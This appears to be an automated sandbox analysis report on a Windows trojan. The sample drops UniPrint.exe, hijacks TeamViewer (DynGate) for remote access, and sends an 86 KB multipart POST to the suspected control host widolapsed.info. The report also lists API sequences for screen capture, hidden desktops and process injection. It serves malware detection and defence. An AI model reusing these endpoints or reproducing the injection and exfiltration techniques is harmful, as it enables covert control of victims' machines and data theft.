Source: svchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmpString found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: wogZe27GBB.exeString found in binary or memory: https://sectigo.com/CPS0
Source: svchost.exe, 00000010.00000003.796660082.00000217C6F8B000.00000004.00000001.sdmpString found in binary or memory: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/
Source: UniPrint.exe, 00000005.00000002.1075859898.00000000057DB000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/8C631A8/ELBASE.dll.mui01
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/
Source: UniPrint.exe, 00000005.00000002.1075859898.00000000057DB000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/(c~
Source: UniPrint.exe, 00000005.00000003.855571733.00000000057D3000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/.i
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/8
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/B
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/ELBASE.dll.mui01
Source: UniPrint.exe, 00000005.00000002.1075859898.00000000057DB000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/apsed.info/B8C631A8/TTP-Out)LMEMX
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/apsed.info/qWave
Source: wogZe27GBB.exeString found in binary or memory: https://www.digicert.com/CPS0
Source: svchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmpString found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmpString found in binary or memory: https://www.roblox.com/info/privacy
Source: UniPrint.exe, 00000005.00000002.1074572782.0000000002A4C000.00000004.00000001.sdmp, UniPrint.exe, 00000005.00000002.1073981229.0000000002740000.00000004.00000001.sdmpString found in binary or memory: https://www.teamviewer.com/buy-now/?utm_medium=masterads&utm_source=master-commercial-use&utm_campai
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drString found in binary or memory: https://www.teamviewer.com/licensing/order.aspx?lng=ja
Source: svchost.exe, 00000010.00000003.797707479.00000217C6FB0000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.797621613.00000217C6F5E000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
Source: UniPrint.exe, 00000005.00000002.1072984731.0000000000B00000.00000004.00000020.sdmpString found in binary or memory: https://www.verisign.c
Source: unknownHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85991Content-Type: multipart/form-data; boundary=--------988836371User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: unknownDNS traffic detected: queries for: ping3.dyngate.com
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C5900 GetProcessHeap,GetProcessHeap,HeapAlloc,HttpQueryInfoW,InternetReadFile,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,RtlMoveMemory,InternetReadFile,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=42047145&p=10000001&client=DynGate&data=FyQSbQCjHqkys5MkoZ6YmBgcGRsZGpmckySiHpgTJqChnpg8MrGzGjExHByxGZkbr5kcmpsaHBgbGRsTJqSiHpg8MrGzGjExHByxGZkbr5kcmpsaHBgbGRsTJ6meq7S3GZcYmJMrHpialxgXGxwbkCip HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=42047145&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=42047152&p=10000001&client=DynGate&data=FyQS8QAjHqmyuig6sTY0saWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAH7LQs0qhaWs0MJjaOW1RZp/s+y/yn5XEbeVZg9sKBJ5zPw4VSW4zdwQ3dPOJPU35FNkIfcILZEzewXzbzR9HNSPt0dvZIMvjxebsFa8mt4yIfhUHNJCrU/eCKZvCgbkPO7XECRgFWPWpqy/DxavH2VA1uMNeC6MgWi1tqYJlUpU HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=42047152&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s7cwujq5MqWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pU HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=42047159&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=42047224&p=10000001&client=DynGate&data=FyQS6wChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMlsrK4MLY0uzKemJMmMLczurCzsp61MJMmNLGytzmyqjy4Mp6YEyakoh6YPDKxsxoxMRwcsRmZG6+ZHJqbGhwYGxkbEyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpqTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=42047224&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.235.146Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=12251267&m=fast&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.235.146Connection: Keep-AliveCache-Control: no-cache
Source: unknownHTTPS traffic detected: 45.153.241.148:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C6B70 GetDesktopWindow,GetDC,CreateCompatibleDC,RtlZeroMemory,GetWindowRect,CreateCompatibleBitmap,SelectObject,BitBlt,RtlZeroMemory,GetCursorInfo,RtlZeroMemory,GetIconInfo,RtlZeroMemory,GetObjectW,DrawIconEx,SHCreateMemStream,RtlZeroMemory,VirtualAlloc,RtlZeroMemory,VirtualFree,DeleteObject,DeleteDC,ReleaseDC,
Source: wogZe27GBB.exe, 00000000.00000002.687265368.000000000079A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,SendMessageA,GlobalUnWire,SetClipboardData,CloseClipboard,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5CA020 GetCurrentThreadId,GetThreadDesktop,StrChrW,CreateDesktopW,CreateThread,WaitForSingleObject,CloseHandle,Sleep,CloseDesktop,
Source: wogZe27GBB.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_0040323C EntryPoint,7329E7F0,SetErrorMode,OleInitialize,SHGetFileInfo,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcat,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcat,lstrcmpi,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C5F30 CommandLineToArgvW,GetProcessHeap,HeapFree,CharLowerW,GetProcessHeap,HeapAlloc,RtlComputeCrc32,GetProcessHeap,HeapFree,GetTickCount,RtlRandom,StrChrW,wsprintfW,WritePrivateProfileStringW,Sleep,Sleep,GetDlgItem,PostMessageW,PostMessageW,PostMessageW,Sleep,Sleep,PostMessageW,Sleep,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,DeleteFileW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,GetTickCount,RtlRandom,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,wsprintfW,GetFileAttributesW,DeleteFileW,StrChrW,StrChrW,StrChrW,wsprintfW,ExpandEnvironmentStringsW,PathIsRelativeW,StrChrW,wsprintfW,StrRChrW,SHCreateDirectoryExW,StrChrW,GetProcessHeap,HeapFree,LocalFree,GetProcessHeap,HeapFree,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5C5F30 CommandLineToArgvW,GetProcessHeap,HeapFree,CharLowerW,GetProcessHeap,HeapAlloc,RtlComputeCrc32,GetProcessHeap,HeapFree,GetTickCount,RtlRandom,StrChrW,wsprintfW,WritePrivateProfileStringW,Sleep,Sleep,GetDlgItem,PostMessageW,PostMessageW,PostMessageW,Sleep,Sleep,PostMessageW,Sleep,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,DeleteFileW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,GetTickCount,RtlRandom,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,wsprintfW,GetFileAttributesW,DeleteFileW,StrChrW,StrChrW,StrChrW,wsprintfW,ExpandEnvironmentStringsW,PathIsRelativeW,StrChrW,wsprintfW,StrRChrW,SHCreateDirectoryExW,StrChrW,GetProcessHeap,HeapFree,LocalFree,GetProcessHeap,HeapFree,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_00404853
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_00406131
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_0053C2D6
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_004A13AA
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_0053E430
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_004C97CD
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_00534810
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_005438ED
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_004AC8A9
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_00544B6A
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_004B9F5A
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_00546FFB
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_004A0FB2
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 11_3_029AF876
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 11_3_029AF876
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 12_2_027ED77A
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: String function: 0040F6FE appears 62 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: String function: 0053BCB5 appears 419 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: String function: 0053E5C8 appears 32 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: String function: 0040DFA6 appears 31 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: String function: 004A1B0C appears 235 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: String function: 0053BCE8 appears 61 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C3760 GetProcessHeap,CreateEnvironmentBlock,RtlZeroMemory,StrChrW,RtlZeroMemory,CreateProcessAsUserW,CreateProcessAsUserW,Sleep,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DestroyEnvironmentBlock,CloseHandle,
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_00401000 NtdllDefWindowProc_A,BeginPaint,GetClientRect,DeleteObject,CreateBrushIndirect,FillRect,DeleteObject,CreateFontIndirectA,SetBkMode,SetTextColor,SelectObject,SelectObject,DrawTextA,SelectObject,DeleteObject,EndPaint,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5CB420 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C8AF0 EntryPoint,DisableThreadLibraryCalls,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryW,ExitProcess,PathAddBackslashW,PathAddBackslashW,GetProcessHeap,HeapAlloc,GetModuleFileNameW,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecW,PathAddBackslashW,SetCurrentDirectoryW,SHGetSpecialFolderPathW,PathAddBackslashW,StrChrW,lstrcatW,GetFileAttributesW,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameW,PathFindFileNameW,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetUserNameW,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,lstrlenW,GetCommandLineW,CommandLineToArgvW,CharLowerW,StrToIntW,LocalFree,RtlZeroMemory,GetPrivateProfileIntW,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,StrChrW,StrChrW,wsprintfW,wsprintfW,LoadLibraryW,ExitProcess,StrChrW,wsprintfW,LoadLibraryW,FindWindowW,FindWindowW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,StrChrW,wsprintfW,GetProcessHeap,HeapFree,LoadLibraryW,StrChrW,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5CB340 NtGetContextThread,NtSetContextThread,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5CB570 NtSuspendThread,NtClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5CB160 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C89F0 NtQuerySystemInformation,StrChrW,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,StrChrW,NtWriteVirtualMemory,NtFlushInstructionCache,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5CB5F0 NtResumeThread,NtClose,HeapFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5CB650 RtlMoveMemory,NtFlushInstructionCache,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C7240 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageW,StrChrW,KillTimer,RtlZeroMemory,StrChrW,wsprintfW,StrChrW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrChrA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntW,StrChrW,wsprintfW,WritePrivateProfileStringW,SetEvent,SetTimer,StrChrW,DispatchMessageW,GetMessageW,KillTimer,VirtualFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C2440 LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetCommandLineW,CommandLineToArgvW,lstrcmpiW,lstrcmpiW,StrRChrW,StrChrW,wsprintfW,OpenEventW,CreateEventW,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C5220 RtlZeroMemory,RtlZeroMemory,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C26E0 RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C1C90 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C1A80 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5CA880 NtQueryVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5CB0B9 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C1570 NtAllocateVirtualMemory,NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C1960 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C7D00 PostThreadMessageW,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageW,CreateThread,CallWindowProcW,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C2FF0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessW,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C27F0 GetFileAttributesW,GetProcessHeap,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RtlZeroMemory,RtlZeroMemory,CreateProcessW,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5CB1A0 NtOpenThread,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5CB420 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5CB570 NtSuspendThread,NtClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5C7D00 PostThreadMessageW,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageW,CreateThread,CallWindowProcW,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5CB5F0 NtResumeThread,NtClose,HeapFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5C7240 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageW,StrChrW,KillTimer,RtlZeroMemory,StrChrW,wsprintfW,StrChrW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrChrA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntW,StrChrW,wsprintfW,WritePrivateProfileStringW,SetEvent,SetTimer,StrChrW,DispatchMessageW,GetMessageW,KillTimer,VirtualFree,
